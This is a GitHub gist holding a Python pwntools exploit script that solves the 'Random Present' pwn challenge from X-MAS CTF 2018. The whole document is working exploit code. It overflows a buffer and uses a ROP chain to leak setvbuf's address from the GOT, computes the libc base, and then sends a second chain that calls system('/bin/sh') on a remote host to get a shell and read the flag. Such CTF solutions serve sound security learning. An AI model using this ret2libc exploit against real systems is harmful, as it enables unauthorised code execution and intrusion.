Skip to content

Instantly share code, notes, and snippets.

@KaoRz
Created December 22, 2018 19:08
Show Gist options
  • Save KaoRz/fcdc4fd70008328e42d84944da8a0d68 to your computer and use it in GitHub Desktop.
Save KaoRz/fcdc4fd70008328e42d84944da8a0d68 to your computer and use it in GitHub Desktop.
Random Present - PWN Challenge | X-MAS CTF 2018
from pwn import *
context(os = "linux", arch = "amd64")
# context.log_level = 'DEBUG'
context.terminal = ['tmux', 'splitw', '-h']
elf = ELF('./chall')
libc = ELF('./libc6_2.19-0ubuntu6.14_amd64.so')
# libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# p = process(elf.path)
def screen_clean():
sys.stdout.write("\033[F")
sys.stdout.write("\033[K")
p = remote('199.247.6.180', 10005)
leak = flat(
"A" * 40,
0x000000000040077b, # 0x000000000040077b : pop rdi ; ret
elf.got['setvbuf'],
elf.sym['puts'],
0x0000000000400676 # main address
)
p.sendlineafter('ROP me!\n', leak)
setvbuf_leak = u64(p.recvline()[:-1].ljust(8, '\x00'))
log.success('Setvbuf leaked address: ' + hex(setvbuf_leak))
setvbuf_offset = libc.sym['setvbuf']
libc.address = setvbuf_leak - setvbuf_offset
while((libc.address & 0xfff) != 0x0):
log.info('Wrong GLIBC detected. Retrying...')
p.close()
screen_clean()
p = remote('199.247.6.180', 10005)
screen_clean()
p.sendlineafter('ROP me!\n', leak)
setvbuf_leak = u64(p.recvline()[:-1].ljust(8, '\x00'))
log.success('Setvbuf leaked address: ' + hex(setvbuf_leak))
libc.address = setvbuf_leak - setvbuf_offset
sleep(1)
log.success('GLIBC address: ' + hex(libc.address))
log.success('System address: ' + hex(libc.sym['system']))
log.success('String /bin/sh address: ' + hex(libc.search('/bin/sh').next()))
log.info('Getting shell...')
boom = flat(
"A" * 40,
0x000000000040077b, # 0x000000000040077b : pop rdi ; ret
libc.search('/bin/sh').next(),
libc.sym['system'],
libc.sym['exit']
)
p.sendlineafter('ROP me!\n', boom)
p.sendline('cat flag')
log.success('Flag: ' + p.recvline())
p.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment